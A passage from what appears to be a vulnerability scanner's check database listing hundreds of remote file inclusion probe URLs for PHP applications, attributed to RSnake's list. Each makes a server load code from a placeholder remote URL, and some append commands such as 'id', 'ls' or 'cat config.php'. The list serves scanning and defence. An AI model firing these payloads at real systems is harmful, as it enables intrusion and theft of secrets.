Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005717\",\"5292\",\"c\",\"/rspa/framework/Controller_v5.php?__IncludeFilePHPClass=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005718\",\"5292\",\"c\",\"/rspa/framework/Controller_v5.php?__IncludeFilePHPClass=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005719\",\"5292\",\"c\",\"/rss.php?page[path]=@RFIURL?&cmd=ls\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005720\",\"5292\",\"c\",\"/rss.php?phpraid_dir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005721\",\"5292\",\"c\",\"/rss.php?premodDir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005722\",\"5292\",\"c\",\"/rss2.php?page[path]=@RFIURL?&cmd=ls\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005723\",\"5292\",\"c\",\"/run.php?dir=SHELL?&file=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005724\",\"5292\",\"c\",\"/s01.php?shopid=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005725\",\"5292\",\"c\",\"/s01.php?shopid=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005726\",\"5292\",\"c\",\"/s02.php?shopid=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005727\",\"5292\",\"c\",\"/s03.php?shopid=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005728\",\"5292\",\"c\",\"/s04.php?shopid=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005729\",\"5292\",\"c\",\"/sablonlar/gunaysoft/gunaysoft.php?icerikyolu=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005730\",\"5292\",\"c\",\"/sablonlar/gunaysoft/gunaysoft.php?sayfaid=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005731\",\"5292\",\"c\",\"/saf/lib/PEAR/PhpDocumentor/Documentation/tests/559668.php?FORUM[LIB]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005732\",\"5292\",\"c\",\"/saf/lib/PEAR/PhpDocumentor/Documentation/tests/559668.php?FORUM[LIB]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005733\",\"5292\",\"c\",\"/sample/xls2mysql/parser_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005734\",\"5292\",\"c\",\"/save.php?file_save=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005735\",\"5292\",\"c\",\"/saveserver.php?thisdir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005736\",\"5292\",\"c\",\"/script//ident/index.php?path_inc=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005737\",\"5292\",\"c\",\"/script/_conf/core/common-tpl-vars.php?confdir=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005738\",\"5292\",\"c\",\"/script/common.inc.php?path_inc=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005739\",\"5292\",\"c\",\"/script/gestion/index.php?path_inc=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005740\",\"5292\",\"c\",\"/script/ident/disconnect.php?path_inc=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005741\",\"5292\",\"c\",\"/script/ident/ident.inc.php?path_inc=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005742\",\"5292\",\"c\",\"/script/ident/identification.php?path_inc=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005743\",\"5292\",\"c\",\"/script/ident/loginliste.php?path_inc=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005744\",\"5292\",\"c\",\"/script/ident/loginmodif.php?path_inc=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005745\",\"5292\",\"c\",\"/script/index.php?path_inc=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005746\",\"5292\",\"c\",\"/script/init/createallimagecache.php?PATH_TO_CODE=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005747\",\"5292\",\"c\",\"/script/menu/menuadministration.php?path_inc=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005748\",\"5292\",\"c\",\"/script/menu/menuprincipal.php?path_inc=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005749\",\"5292\",\"c\",\"/script/param/param.inc.php?path_inc=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005750\",\"5292\",\"c\",\"/script/plugins/phpgacl/admin/index.php?path_inc=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005751\",\"5292\",\"c\",\"/script/template/index.php?main_page_directory=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005752\",\"5292\",\"c\",\"/script/tick/allincludefortick.php?PATH_TO_CODE=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005753\",\"5292\",\"c\",\"/script/tick/test.php?PATH_TO_CODE=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005754\",\"5292\",\"c\",\"/script_path/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005755\",\"5292\",\"c\",\"/script_path/cms/classes/openengine/filepool.php?oe_classpath=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005756\",\"5292\",\"c\",\"/script_path/installation/index.php?mosConfig_absolute_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005757\",\"5292\",\"c\",\"/script_path/pgvnuke/pgvindex.php?DOCUMENT_ROOT/header.php=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005758\",\"5292\",\"c\",\"/scripts/check-lom.php?ETCDIR=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005759\",\"5292\",\"c\",\"/scripts/gallery.scr.php?GLOBALS[PTH][func]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005760\",\"5292\",\"c\",\"/scripts/lom_update.php?ETCDIR=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005761\",\"5292\",\"c\",\"/scripts/news.scr.php?GLOBALS[PTH][classes]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005762\",\"5292\",\"c\",\"/scripts/polls.scr.php?GLOBALS[PTH][classes]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005763\",\"5292\",\"c\",\"/scripts/rss.scr.php?GLOBALS[PTH][classes]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005764\",\"5292\",\"c\",\"/scripts/search.scr.php?GLOBALS[PTH][classes]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005765\",\"5292\",\"c\",\"/scripts/sitemap.scr.php?GLOBALS[PTH][classes]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005766\",\"5292\",\"c\",\"/scripts/sitemap.scr.php?GLOBALS[PTH][classes]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005767\",\"5292\",\"c\",\"/scripts/weigh_keywords.php?ETCDIR=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005768\",\"5292\",\"c\",\"/scripts/xtextarea.scr.php?GLOBALS[PTH][spaw]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005769\",\"5292\",\"c\",\"/search.php?config[\\\"sipssys\\\"]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005770\",\"5292\",\"c\",\"/search.php?id=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005771\",\"5292\",\"c\",\"/search.php?insPath=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005772\",\"5292\",\"c\",\"/search/submit.php?config[\\\"sipssys\\\"]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005773\",\"5292\",\"c\",\"/search_wA.php?LIBPATH=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005774\",\"5292\",\"c\",\"/searchbot.php?path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005775\",\"5292\",\"c\",\"/security/include/_class.security.php?PHPSECURITYADMIN_PATH=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005776\",\"5292\",\"c\",\"/sendstudio/admin/includes/createemails.inc.php?ROOTDIR=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005777\",\"5292\",\"c\",\"/sendstudio/admin/includes/send_emails.inc.php?ROOTDIR=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005778\",\"5292\",\"c\",\"/senetman/html/index.php?page=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005779\",\"5292\",\"c\",\"/services.php?page=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005780\",\"5292\",\"c\",\"/services/samples/inclusionService.php?CabronServiceFolder=@RFIURL%00\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005781\",\"5292\",\"c\",\"/settings.php?P[includes]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005782\",\"5292\",\"c\",\"/settings_sql.php?path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005783\",\"5292\",\"c\",\"/setup/inc/database.php?tcms_administer_site=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005784\",\"5292\",\"c\",\"/setup/upgrader.php?RootDirectory=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005785\",\"5292\",\"c\",\"/sezhoo/SezHooTabsAndActions.php?IP=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005786\",\"5292\",\"c\",\"/shop/includes/header.inc.php?dateiPfad=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005787\",\"5292\",\"c\",\"/shop/index.php?action=@RFIURL?&cmd=cat%20config.php\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005788\",\"5292\",\"c\",\"/shop/page.php?osCsid=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005789\",\"5292\",\"c\",\"/shop/page.php?pageid=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005790\",\"5292\",\"c\",\"/shoutbox.php?language=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005791\",\"5292\",\"c\",\"/shoutbox.php?root=@RFIURL?cmd=id\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005792\",\"5292\",\"c\",\"/show.php?file=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005793\",\"5292\",\"c\",\"/show.php?id=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005794\",\"5292\",\"c\",\"/show.php?page=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005795\",\"5292\",\"c\",\"/show.php?path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005796\",\"5292\",\"c\",\"/show_archives.php?cutepath=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005797\",\"5292\",\"c\",\"/sid=XXXXXXXXXXXXXXXXXXXXXXXXXXXX&shopid=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005798\",\"5292\",\"c\",\"/sid=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005799\",\"5292\",\"c\",\"/signer/final.php?smiley=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005800\",\"5292\",\"c\",\"/signin.php?sent=1&AMG_serverpath=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005801\",\"5292\",\"c\",\"/sinagb.php?fuss=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005802\",\"5292\",\"c\",\"/sinapis.php?fuss=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005803\",\"5292\",\"c\",\"/sitebar/Integrator.php?file=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005804\",\"5292\",\"c\",\"/sitebar/index.php?writerFile=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005805\",\"5292\",\"c\",\"/sitebuilder/admin/top.php?admindir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005806\",\"5292\",\"c\",\"/sitemap.xml.php?dir[classes]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005807\",\"5292\",\"c\",\"/skin/board/default/doctype.php?dir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005808\",\"5292\",\"c\",\"/skin/dark/template.php?path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005809\",\"5292\",\"c\",\"/skin/gold/template.php?path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005810\",\"5292\",\"c\",\"/skin/html/table.php?pachtofile=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005811\",\"5292\",\"c\",\"/skin/original/template.php?path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005812\",\"5292\",\"c\",\"/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005813\",\"5292\",\"c\",\"/skins/advanced/advanced1.php?pluginpath[0]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005814\",\"5292\",\"c\",\"/skins/default.php?dir_inc=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005815\",\"5292\",\"c\",\"/skins/header.php?ote_home=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005816\",\"5292\",\"c\",\"/skins/phpchess/layout_admin_cfg.php?Root_Path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005817\",\"5292\",\"c\",\"/skins/phpchess/layout_cfg.php?Root_Path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005818\",\"5292\",\"c\",\"/skins/phpchess/layout_t_top.php?Root_Path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005819\",\"5292\",\"c\",\"/skysilver/login.tpl.php?theme=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005820\",\"5292\",\"c\",\"/slogin_lib.inc.php?slogin_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005821\",\"5292\",\"c\",\"/slogin_lib.inc.php?slogin_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005822\",\"5292\",\"c\",\"/smarty.php?xcart_dir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005823\",\"5292\",\"c\",\"/smarty.php?xcart_dir=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005824\",\"5292\",\"c\",\"/smarty/smarty_class.php?_smarty_compile_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005825\",\"5292\",\"c\",\"/smilies.php?config=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005826\",\"5292\",\"c\",\"/snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005827\",\"5292\",\"c\",\"/snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005828\",\"5292\",\"c\",\"/snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005829\",\"5292\",\"c\",\"/snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005830\",\"5292\",\"c\",\"/snort/base_stat_common.php?BASE_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005831\",\"5292\",\"c\",\"/social_game_play.php?path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005832\",\"5292\",\"c\",\"/software_upload/public_includes/pub_templates/vphptree/template.php?vsDragonRootPath=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005833\",\"5292\",\"c\",\"/song.php?phpbb_root_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list 